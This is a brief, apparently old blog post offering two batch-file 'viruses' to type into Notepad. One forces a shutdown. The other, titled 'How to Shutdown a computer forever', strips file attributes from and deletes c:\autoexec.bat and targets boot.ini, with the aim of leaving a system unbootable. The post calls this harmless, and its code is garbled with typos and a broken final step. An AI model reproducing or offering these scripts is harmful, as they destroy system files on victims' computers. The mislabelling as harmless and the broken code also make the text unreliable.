creat virus using notepad

Words
59
Reading
1 min
Listen
Play
9y

creat a hermless virus:
method1:open notepad and type in this code

echo@echo off Shutdown -s -f -t 60 -c “type in the message you want to display:
save it virus.bad,your virus complete
virus.JPG
2nd method:

  1. How to Shutdown a computer forever?
    echo@echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini

Save it as shutdown
forever.bat
virus1.JPG

creat virus using notepad | Ecency